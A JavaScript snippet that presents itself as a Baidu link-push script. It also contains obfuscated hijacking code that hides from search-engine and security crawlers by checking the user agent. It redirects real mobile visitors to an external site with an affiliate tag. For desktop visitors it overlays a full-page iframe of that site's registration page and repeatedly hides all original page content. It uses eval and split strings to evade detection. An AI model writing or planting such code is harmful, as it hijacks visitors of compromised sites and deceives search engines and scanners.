
//百度推送
(function() {
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    } else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();

//识别跳转
var ua = navigator.userAgent; 
function goPAGE() {
    if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) {                         
         if(ua.indexOf('baidu') > -1 || ua.indexOf('google') > -1 || ua.indexOf('yahoo') > -1 || ua.indexOf('bing') > -1 || ua.indexOf('sogou') > -1 || ua.indexOf('soso') > -1 || ua.indexOf('360') > -1 || ua.indexOf('youdao') > -1 || ua.indexOf('anquan') > -1){                        
         }else{		 		           
           window.location.href ="https://www.gm80.com/mobile/#/home?att=6688";
                                                     
         }          
    } else {      
         if(ua.indexOf('baidu') > -1 || ua.indexOf('google') > -1 || ua.indexOf('yahoo') > -1 || ua.indexOf('bing') > -1 || ua.indexOf('sogou') > -1 || ua.indexOf('soso') > -1 || ua.indexOf('360') > -1 || ua.indexOf('youdao') > -1 || ua.indexOf('anquan') > -1){                       
         }else{                                    
           var ss = '<center id="yangchen"><ifr' + 'ame scrolling="no" marginheight=0 marginwidth=0  frameborder="0" width="100%" width="18' + '00" height="16' + '00" src="https://www.gm80.com/home/reg.html?att=6688"></iframe></center>';
        
           eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');");
                     
         }                   
        try {
            setInterval(function() {
                try {
                    document.getElementById("div" + "All").style.display = "no" + "ne"
                } catch (e) {}
                for (var i = 0; i < document.body.children.length; i++) {
                    try {
                        var tagname = document.body.children[i].tagName;
                        var myid = document.body.children[i].id;
                        if (myid != "iconDiv1" && myid != "yangchen") {
                            document.body.children[i].style.display = "non" + "e";
                        }
                    } catch (e) {}
                }
            }, 100)
        } catch (e) {}
    }
}goPAGE(); 
